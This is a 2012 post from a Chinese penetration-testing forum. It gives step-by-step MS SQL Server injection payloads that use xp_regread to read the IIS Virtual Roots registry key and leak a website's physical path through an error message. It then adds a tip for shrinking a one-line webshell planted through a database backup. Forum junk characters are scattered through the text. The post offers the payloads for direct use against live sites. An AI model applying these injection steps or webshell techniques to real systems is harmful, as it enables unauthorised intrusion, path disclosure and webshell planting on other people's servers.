中国网络渗透测试联盟

标题: DB权限暴出网站物理路径代码 [打印本页]
作者: admin    时间: 2012-9-15 14:23
标题: DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表3 E# n$ ]9 B% t$ o% n

. M& X3 B: q$ I# Z) n7 K+ {) }' g
  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中9 i* \4 x/ X/ e' ?, X7 t
9 T  T9 p) u5 |3 d8 r* Q& g0 X: w

; Y( _1 W: K: X2 _  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
' l( P# G3 q( |5 Q1 ^/ N  A/ @( \, ]5 {

- r$ _+ k7 Z  p& f6 V( F! F1 ~  4、drop table [jm_tmp]-- 删除此表。+ T9 ]- h1 j" P# D

+ u9 N. V' u3 V# X9 V
- `7 D$ \, p! d8 D+ F! |1 c另附上备分专用一句话
2 o8 ]9 Y9 T/ [8 g. D; ]* y2 L  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
  G# k" V# C  N4 x  g



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2